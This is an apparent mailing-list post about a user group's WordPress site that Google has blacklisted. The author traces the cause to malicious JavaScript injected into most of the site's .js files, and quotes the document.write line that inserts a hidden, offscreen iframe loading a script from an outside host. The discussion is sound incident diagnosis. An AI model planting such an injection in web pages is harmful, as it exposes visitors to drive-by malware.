[Nottingham] A Google Webmaster Scam?

Martin martin at ml1.co.uk
Wed Dec 19 17:20:43 UTC 2012


On 19/12/12 17:11, Martin wrote:
> On 19/12/12 02:58, Andy White wrote:
>> On Wed, Dec 19, 2012 at 02:36:02AM +0000, Martin wrote:
>>> Folks,
>>>
>>> So we've had our website on Wordpress for a good while now and...
>>>
>>> After upgrading to the latest Wordpress 3.5, Google have dropped this
>>> bombshell and have insisted that I join the "Webmasters Tools" site to
>>> remove their blacklisting from the NLUG site...
>>>
>>> So... Is this for real?!
>>
>> google's apparently objecting to references to http://ozecqnxm.qhigh.com.
>>
>> Poking around in the js, you can see that there are src parameters
>> to http://ozecqnxm.qhigh.com/terafegwqegwg.cgi?5
> 
> Indeed so! A quick grep has soon found that. Looks damned suspicious.


So, it looks to have inserted in most of the .js files:

document.write('<iframe width="50" height="50"
style="width:100px;height:100px;position:absolute;left:-100px;top:0;"
src="http://ozecqnxm.qhigh.com/terafegwqegwg.cgi?5"></iframe>');


I normally have the entire site read-only except for when I'm doing
updates... So I wonder if I've been clobbered by a bad update? Or if
there really has been a break-in via WP...

First off is a quick sed, and then further checks...


Cheers,
Martin

-- 
- ------------------ - ----------------------------------------
-    Martin Lomas    - OpenPGP (GPG/PGP) Public Key: 0xCEE1D3B7
- martin @ ml1 co uk - Import from   hkp://subkeys.pgp.net   or
- ------------------ - http:// ml1 .co .uk/martin_ml1_co_uk.gpg



More information about the Nottingham mailing list